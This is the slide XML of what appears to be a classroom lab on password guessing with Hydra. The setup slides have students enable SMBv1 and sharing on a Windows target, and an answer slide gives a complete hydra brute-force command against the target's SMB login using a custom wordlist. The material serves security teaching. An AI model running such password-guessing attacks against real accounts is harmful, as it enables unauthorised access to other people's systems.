                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> tee</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> -a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> lab9.lst</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="0" dirty="0">
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE383B01-1417-0842-B75E-C785D4EE08A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="1109964"/>
            <a:ext cx="4192951" cy="3463446"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="403009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Placeholder 2"/>
          <p:cNvPicPr>
            <a:picLocks/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect r="51067"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="-3175" y="-1588"/>
            <a:ext cx="44831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Password Guessing with Hydra</a:t>
            </a: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71527310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B6A704-00A1-4EDA-9B14-61EE6C82FC04}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Setup</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Text Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A4704FA0-12B6-46D3-8001-4F3D7CA6A226}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="231388" y="941160"/>
            <a:ext cx="8572840" cy="3955095"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>You may have to go into the Windows Network Settings and enable File and Print Sharing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>It depends on what kind of network connection you select</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Public needs to be manually enabled</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C777B29A-7F6B-4855-B1A6-E4CB82C0B509}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1431643" y="1720536"/>
            <a:ext cx="5764426" cy="334729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6F5E491-A1B2-46D2-9B73-7D2938BFCAA0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="287381" y="2400500"/>
            <a:ext cx="1998968" cy="2397339"/>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7F81FA9C-9662-CE44-AD2E-F8ECD768B061}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5020135" y="2740552"/>
            <a:ext cx="4351867" cy="1307258"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="181689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97172E-9B90-4805-BCB6-B5C53CA62C25}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Setup</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Text Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AAB10F7C-83A9-49F0-B214-82CC770E9BDB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="285580" y="798102"/>
            <a:ext cx="8572840" cy="3955095"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You will need to enable SMBv1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use the "Turn Windows Features..." panel</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Confirm with nmap if needed</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04F99237-4F6E-B748-A04C-779927387991}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6693279" y="891873"/>
            <a:ext cx="2058678" cy="3955096"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8D01AFF-6572-8444-AB26-F30B6FA6D602}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="691635" y="1671255"/>
            <a:ext cx="4351705" cy="3312161"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="000000">
                <a:alpha val="0"/>
              </a:srgbClr>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="424049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01F5F6-44EC-4519-94EA-D4B1B88F88E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Setup</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Text Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C85514E-8E6A-42BB-9759-3AAC249E1A56}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="287381" y="921704"/>
            <a:ext cx="4492142" cy="3955095"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Also, if this is the VM, you will already have the firewall disabled</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>If you disable it from your host system, make sure to enable it after the lab</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8D938F2-2D47-A145-B9D4-24D15D1EF7AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5994400" y="858840"/>
            <a:ext cx="2714561" cy="4017959"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="425942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Hydra for guessing passwords</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Text Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="287381" y="921704"/>
            <a:ext cx="4161402" cy="3955095"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t">
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Refer again to our options, run hydra</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>hydra</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Review the options and example on the bottom of the screen right</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Use hydra with our new lab9.lst dictionary to attack the smb server of the Windows target </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Once that completed, try it again but by using the '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>xhydra</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>' GUI tool</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Hint: You will not need to specify options such as port. By specifying a service, hydra automatically provides settings</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9BDFCEB-4348-1A43-89ED-0118DBD71A1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4546237" y="1349851"/>
            <a:ext cx="4487301" cy="3205216"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3916753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2" y="1016836"/>
            <a:ext cx="4611189" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>Spoiler ahead</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F55808C-53BD-4C92-A8DB-B7A9FECE327A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Spoiler!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="250254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Hydra for guessing passwords</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Answers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>An</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Text Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>hydra -l </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>IEUser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t> -P /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>/share/wordlists/lab9.lst </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>smb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>://10.10.0.5</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0277E24B-F289-2C48-B96E-3FC3FFFAAB46}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="283779" y="1774689"/>
            <a:ext cx="8736496" cy="1594121"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="lt1"/>
          </a:solidFill>
          <a:ln w="22225">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1455657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D78B29-110D-457B-A091-1599EEC4CA6C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hydra for guessing passwords</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D5B4E8E0-DB9B-4A44-BDF8-3B62FD4A6582}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="68983" y="1312333"/>
            <a:ext cx="2924725" cy="3544949"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4226A614-41CC-8540-9467-BD02F4A9C769}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3104951" y="1312333"/>
            <a:ext cx="2937081" cy="3544949"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{33012550-33AC-1340-8B94-D9C17361ED75}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6170209" y="1312333"/>
            <a:ext cx="2937081" cy="3530146"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="194446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Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"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ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Labs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101378" name="Text Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"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10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Password and Authentication Lab</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Building a dictionary</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
